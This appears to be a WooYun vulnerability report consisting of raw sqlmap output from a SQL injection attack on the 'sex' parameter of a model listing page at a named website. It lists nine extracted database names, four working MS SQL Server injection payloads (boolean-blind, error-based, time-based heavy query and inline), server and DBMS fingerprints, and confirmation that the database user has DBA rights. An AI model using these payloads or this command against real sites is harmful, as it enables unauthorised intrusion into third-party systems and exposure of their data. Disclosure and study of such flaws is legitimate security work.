WooYun.org

sqlmap.py -u "http://www.china-ef.com/models/modelList.aspx?sex=1"
available databases [9]:
[*] chinaef_db
[*] manager_db
[*] master
[*] media_db
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: sex
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sex=1 AND 3705=3705
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sex=1 AND 8765=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(117)+CH
AR(111)+CHAR(113)+(SELECT (CASE WHEN (8765=8765) THEN CHAR(49) ELSE CHAR(48) END
))+CHAR(113)+CHAR(109)+CHAR(107)+CHAR(100)+CHAR(113)))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: sex=1 AND 6444=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS s
ys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers
AS sys7)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: sex=(SELECT CHAR(113)+CHAR(106)+CHAR(117)+CHAR(111)+CHAR(113)+(SELE
CT (CASE WHEN (7012=7012) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109)+
CHAR(107)+CHAR(100)+CHAR(113))
---
[04:05:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[04:05:42] [INFO] testing if current user is DBA
current user is DBA: True
[04:05:42] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\administrator\.sqlmap\output\www.china-ef.com'